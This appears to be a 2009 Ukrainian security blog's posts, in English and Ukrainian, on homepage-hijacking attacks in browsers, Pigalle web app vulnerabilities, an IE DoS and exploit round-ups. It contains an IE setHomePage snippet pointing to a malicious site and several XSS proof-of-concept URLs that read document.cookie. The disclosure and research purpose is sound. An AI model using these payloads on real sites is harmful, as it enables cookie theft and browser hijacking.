Websecurity - Веб безпека

This is English version of my Dark home article.

After the article Dark side of bookmarks, I’ll draw you attention to another aspect of security which concerned with web browsers.

There is such useful functionality in browsers as Home Page (homepage). To which browser is going at his start (if it’s set accordingly). At first sight this functionality doesn’t betoken any problems with security for users of the browsers, but it’s not so. There are several attacks, which can be conducted via homepage function. I planned to tell about it already in 2008 and I’d tell you about it in my article “Dark home”.

Note, that if in my practice I saw attacks via bookmarks few times, then attacks via homepage function I saw many times. Particularly there are programs, which at their installation on computer (including secretly) are changing homepage setting in IE.

Attacks via homepage function.

There are possible next attacks via homepage function:

1. Spam.
2. Phishing.
3. Malware spreading.
4. DoS attacks.

This browsers’ functionality creates conditions for conducting of persistent attacks, because adjusted homepage are saving in settings of the browsers at computers of the users. So every of above-mentioned attacks is persistent attack, which can trigger at the next start of the browser, or when user will press Home button in his browser. So probability of triggering of this attack is much higher, then at attack via bookmarks.

Methods of conducting of attacks.

The next methods can be used for setting of malicious homepages:

1. Social engineering: inscriptions “Set your homepage” at the sites under control of offenders (where code for redirection or other code is placed, which will trigger on next visit of the site).
2. Hacking of the sites and changing of codes in links “Set your homepage” to codes with malicious link, or putting of such links at the sites under control of offenders.
3. Using of viruses for changing of existent settings of homepage to malicious link in victim’s browser.
4. Using of attacks with active (looped) proposition to set as homepage (in Internet Explorer), so as to let victim to accidentally set this site as homepage (or to force her to do it).

Attacks in different browsers.

Among above-mentioned methods of attacks all four work in Internet Explorer, and in other browsers only attacks 1 and 3. So at attack on users of all browsers, and especially alternative ones, methods of social engineering, or viruses can be used. At using of viruses, during of changing of homepage settings in browser, it’s needed also to check if browser is set in such way, to start with a blank page, and if it’s set in this way, then to change this option, to let browser starts with homepage.

At attack on users of Internet Explorer, attacks 2 and 4 can be used. For this it’s needed to use the code of setting as Homepage (which works only in IE).

<a href="#" onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://badsite')">Set your homepage!</a>

Spam.

Advertising site can be set as homepage. So homepage function can be used for spam spreading. And besides of site advertising in such way, it also can be used for turning of statistic of this site (in different ratings).

Phishing.

Just as in case of spam, homepage function can be used for phishing. But in this case, besides conducting of attack via methods 1, 2 and 4, the most effective will be method 3. So as to let virus to find (in history, in bookmarks or in homepage settings), which bank the victim is using, and to set phishing site of this bank as homepage. So as to let victim to run browser and right away proceed to phishing site, which pose itself as a site of her bank.

Malware spreading.

Attack will be conducting via setting link on exploit for browser as homepage. Which will execute malicious code in browser of the user, after start of the browser, and will install virus at his computer.

DoS attacks.

Attack will be conducting via setting link on DoS exploit as homepage. After starting of the browser by the user, his browser will crash or freeze. At that it will be persistent attack, which will be repeated at every start of the browser, so user will can’t use it at all, until he change this option.

Mechanism of setting as homepage also can be used by itself for conducting of DoS attack on browsers. This attack I called DoS via homepage. Internet Explorer 6, Internet Explorer 7 and previous versions (and possible next versions too) are vulnerable to it.

Conclusions.

Attacks via homepage function are completely real and dangerous. So users of the browsers must be careful in Internet and don’t set any site as homepage. And it’s advisable to set own browser is such way, so at start not homepage opens, but a blank page.

15.09.2009

У січні, 23.01.2009, я знайшов Information Leakage, Full path disclosure та Cross-Site Scripting уразливості в Pigalle. Це веб додаток від автора Power Phlogger та YaBook. Уразливості виявив на офіційному сайті http://pigalle.phpee.com. Про що найближчим часом повідомлю розробнику.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику веб додатка.

07.11.2009

Information Leakage:

http://site/index.php

В meta-тегах на всіх сторінках виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/index.php

http://site/index.php?start=1′

http://site/index.php?mode=view&alb=IBM_Stucki&pic=1

http://site/index.php?mode=view&alb=1

http://site/index.php?mode=view

http://site/index.php?mode=album

http://site/index.php?mode=album&alb=1

http://site/config.inc.php

http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=’

XSS:

http://site/index.php?mode=view&alb=IBM_Stucki&pic=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=%3CBODY%20onload=alert(document.cookie)%3E
http://site/index.php?mode=view&alb=IBM_Stucki&pic=Image3.jpg&size=%3CBODY%20onload=alert(document.cookie)%3E

Уразливі Pigalle 0.76-alpha та попередні версії.

В даній добірці експлоіти в веб додатках:

• Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln (деталі)
• TotalCalendar 2.4 Remote Password Change Exploit (деталі)
• e107 <= 0.7.15 (extended_user_fields) Blind SQL Injection Exploit (деталі)
• Zervit Webserver 0.3 Remote Denial Of Service Exploit (деталі)
• Dokeos LMS <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit (деталі)
• I-Rater Pro/Plantinum v4 (Auth Bypass) SQL Injection Vulnerability (деталі)
• Oracle RDBMS 10.2.0.3/11.1.0.6 TNS Listener PoC (CVE-2009-0991) (деталі)
• VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability (деталі)
• Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability (деталі)
• NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability (деталі)
• TotalCalendar 2.4 (include) Local File Inclusion Vulnerability (деталі)
• PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities (деталі)
• CRE Loaded 6.2 (products_id) SQL Injection Vulnerability (деталі)
• MixedCMS 1.0b (LFI/SU/AB/FD) Multiple Remote Vulnerabilities (деталі)
• Studio Lounge Address Book 2.5 Authentication Bypass Vulnerability (деталі)

Сьогодні я підтвердив свої підозри стосовно Denial of Service уразливості в Internet Explorer. Ще в літку 2008 я здогадувався про існування цієї уразливості й лише сьогодні перевирів її, під час написання своєї статті.

Дану атаку я назвав DoS через хоумпейдж (DoS via homepage attack).

DoS:

IE DoS Exploit10.html

При запуску експлоіта в IE6 браузер блокується, ним стає неможливо користуватися і його можна лише закрити (через Task Manager).

При запуску експлоіта в IE7 і кліку по лінці браузер зависає.

Уразлива версія Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) та попередні версії (та потенційно й наступні версії).

Після статті Темна сторона закладок, зверну вашу увагу на ще один аспект безпеки пов’язаний з веб браузерами.

В браузерах існує такий корисний функціонал як домашня сторінка (homepage). На яку браузер переходить при його запуску (при його відповідному налаштуванні). На перший погляд даний функціонал не передвіщує жодних проблем з безпекою для користувачів браузерів, але це не так. Існує ряд атак, які можуть проводитися через функцію домашньої сторінки. Про це я запланував розповісти ще в 2008 році і розповім вам про це в своїй статті “Темний дім” (Dark home).

Зазначу, що якщо в своїй практиці я декілька разів зустрічав атаки через закладки, то атаки через функцію домашньої сторінки я зустрічав багато разів. Зокрема існують програми, які при встановленні на комп’ютер (в тому числі приховано), змінюють налаштування домашньої сторінки в IE.

Атаки через функцію домашньої сторінки.

Можливі наступні атаки через функцію домашньої сторінки:

1. Спам.
2. Фішинг.
3. Поширення шкідливого коду.
4. DoS атаки.

Даний функціонал браузерів створює умови для проведення постійних (persistent) атак, тому що задана домашня сторінка зберігається в налаштуваннях браузерів на комп’ютерах користувачів. Тому кожна з вищезгаданих атак є постійною атакою, яка може спрацювати при черговому запуску браузера, або коли користувач натисне кнопку Home в своєму браузері. Тобто вірогідність спрацювання даної атаки набагато більша, ніж при атаці через закладки.

Методи проведення атак.

Для встановлення шкідливих хоумпейджів можуть застосовуватися наступні методи:

1. Соціальна інженерія: надписи “Зробіть своєю домашньою сторінкою” на сайтах підконтрольних зловмисникам (де розміщений код для редирекції чи інший код, що спрацює при наступному відвідуванні сайта).
2. Взлом сайтів і зміна кодів у лінках “Зробити своєю домашньою сторінкою” на коди з шкідливою лінкою, або встановлення подібних лінок на сайтах підконтрольних зловмисникам.
3. Використання вірусів для зміни існуючих налаштувань домашньої сторінки на шкідливу лінку у браузері жертви.
4. Використання атак з активною (зацикленою) пропозицією додати в якості Homepage (в Internet Explorer), щоб жертва випадково зробила даний сайт своєю домашньою сторінкою (або змусити її це зробити).

Атаки в різних браузерах.

Серед вищенаведених методів атак в Internet Explorer працюють всі чотири, а в інших браузерах лише атаки 1 і 3. Тому при атаці на користувачів всіх браузерів, і особливо альтернативних, можна використати методи соціальної інженерії, або віруси. При використанні вірусів, під час зміни налаштувань домашньої сторінки в браузері, потрібно також перевірити чи не налаштований браузер таким чином, щоб запускатися з пустою сторінкою, і якщо він налаштований саме так, то змінити цю опцію, щоб браузер запускався з домашньою сторінкою.

При атаці на користувачів Internet Explorer, можна використати атаки 2 і 4. Для цього потрібно використати код встановлення в якості Homepage (що працює лише в IE).

<a href="#" onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://badsite')">Зроби своєю домашньою сторінкою!</a>

Спам.

В якості домашньої сторінки може бути вказаний рекламний сайт. Тобто функція домашніх сторінок може використовуватися для поширення спаму. І окрім реклами сайта таким чином, це також може використовуватися для накручування статистики даного сайта (в різних рейтингах).

Фішинг.

Так само як і у випадку спаму, функція домашніх сторінок може використовуватися для фішингу. Але в цьому випадку, окрім проведення атаки через методи 1, 2 і 4, особливо ефективними буде метод 3. Щоб вірус виявив (в історії, закладках чи налаштуванні домашньої сторінки), яким банком користується жертва, і встановив в якості домашньої сторінки фішинг сайт даного банку. Щоб жертва запустила браузер і одразу перейшла на фішерський сайт, який видає себе за сайт саме її банку.

Поширення шкідливого коду.

Атака буде відбуватися через встановлення в якості домашньої сторінки лінки на експлоіт для браузера. Що виконає шкідливий код в браузері користувача, після запуску браузера, і встановить вірус на його комп’ютер.

DoS атаки.

Атака буде відбуватися через встановлення в якості домашньої сторінки лінки на DoS експлоіт. Після запуску браузера користувачем, його браузер вилетить або зависне. Причому це буде постійна атака, яка буде повторюватися при кожному запуску браузера, що користувач взагалі не зможе ним користуватися, доки не змінить дану опцію.

Також механізм встановлення в якості домашньої сторінки сам може бути використаний для проведення DoS атаки на браузери. Дану атаку я назвав DoS через хоумпейдж. До неї уразливі Internet Explorer 6, Internet Explorer 7 та попередні версії (та потенційно й наступні версії).

Висновки.

Атаки через функцію домашньої сторінки є цілком реальними і небезпечними. Тому користувачам браузерів потрібно бути уважними в Інтернеті і не додавати будь-який сайт в якості домашньої сторінки. І бажано налаштувати свій браузер таким чином, щоб при запуску відкривалася на домашня, а пуста сторінка.

В записі Як отримати безкоштовні зворотні лінки я зробив анонс свого SEO методу.

Для автоматизації деяких робіт по використанню SEO методу для своїх клієнтів (користувачів методу) я розробив декілька додатків.

15.06.2009 я розробив першу версію WebpageUploader. Поточна версія програми WebpageUploader 1.06. Вона призначена для завантаження html сторінок на веб сайти.

А сьогодні я розробив нову програму - WebpageChecker. Вона призначена для перевірки наявності html сторінок на веб сайтах. Але також може бути використана для перевірки наявності будь-яких файлів на сайтах.

Програми можуть працювати в парі. Результати роботи WebpageUploader можуть бути використані в WebpageChecker - для подальшої перевірки наявності html сторінок на даних сайтах. Обидві програми стануть в нагоді всім користувачам мого SEO методу.

В даній добірці уразливості в веб додатках:

• AREVA e-terrahabitat / e-terraplatform Multiple Vulnerabilities (деталі)
• EZ-Blog Beta 1 Multiple SQL Injection (деталі)
• BlogMan 0.45 Multiple Vulnerabilities (деталі)
• YEKTA WEB Academic Web Tools CMS Multiple XSS (деталі)
• Afian Document Manager Local File Inclusion (деталі)
• Drupal Local File Inclusion Vulnerability (Windows) (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Unauthorized Access to Data (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code, Denial of Service (DoS) (деталі)
• eXtplorer Remote Code Execution (деталі)
• RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability (деталі)

29.10.2009

Виявлені численні уразливості безпеки в Mozilla Firefox і SeaMonkey

Уразливі продукти: Mozilla Firefox 3.0, Firefox 3.5, SeaMonkey 2.0.

Переповнення буфера, підвищення привілеїв, витік інформації, міжсайтовий скриптінг.

• Mozilla Firefox Floating Point Memory Allocation Vulnerability (деталі)
• Mozilla Foundation Security Advisory 2009-52 (деталі)
• Mozilla Foundation Security Advisory 2009-53 (деталі)
• Mozilla Foundation Security Advisory 2009-54 (деталі)
• Mozilla Foundation Security Advisory 2009-55 (деталі)
• Mozilla Foundation Security Advisory 2009-56 (деталі)
• Mozilla Foundation Security Advisory 2009-57 (деталі)
• Mozilla Foundation Security Advisory 2009-59 (деталі)
• Mozilla Foundation Security Advisory 2009-61 (деталі)
• Mozilla Foundation Security Advisory 2009-62 (деталі)
• Mozilla Foundation Security Advisory 2009-63 (деталі)
• Mozilla Foundation Security Advisory 2009-64 (деталі)
• Mozilla Firefox 3.5.3 Local Download Manager Exploit (деталі)

05.11.2009

Додаткова інформація.

• Mozilla Firefox GIF Color Map Parsing Buffer Overflow Vulnerability (деталі)
• Context IS Advisory - Autocomplete Data Theft in Mozilla Firefox (деталі)

В даній добірці експлоіти в веб додатках:

• Online Email Manager Insecure Cookie Handling Vulnerability (деталі)
• Online Guestbook Pro (display) Blind SQL Injection Vulnerability (деталі)
• Flatnux 2009-03-27 (Upload/ID) Multiple Remote Vulnerabilities (деталі)
• Seditio CMS Events Plugin (c) Remote SQL Injection Vulnerability (деталі)
• Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability (деталі)
• Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities (деталі)
• TotalCalendar 2.4 (inc_dir) Remote File Inclusion Vulnerability (деталі)
• FunGamez rc1 (AB/LFI) Multiple Remote Vulnerabilities (деталі)
• WB News 2.1.2 Insecure Cookie Handling Vulnerability (деталі)
• WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit (деталі)
• Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth) (деталі)
• Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit (деталі)
• EZ Webitor (Auth Bypass) SQL Injection Vulnerability (деталі)
• webClassifieds 2005 (Auth Bypass) Insecure Cookie Handling Vuln (деталі)
• eLitius 1.0 Arbitrary Database Backup Exploit (деталі)

У березні, 10.03.2009, я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на http://www.ibm.com - сайті компанії IBM. Яка є секюріті компанією (після купівлі ISS і Watchfire). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.ibm.com.

Insufficient Anti-automation:

В формі “E-mail this page” на сторінках сайта http://www.ibm.com (www.ibm.com, www-01.ibm.com та інших доменах) немає захисту від автоматизованих запитів (капчі).

Abuse of Functionality:

В даній формі можна вказати емайл, ім’я та призвіще отримувача, емайл, ім’я та призвіще відправника, тому її можна використати для розсилання спаму. А з врахуванням функції “Send me a copy of this e-mail” та Insufficient Anti-automation, дана уразливість створює з форми цілий Spam Gateway.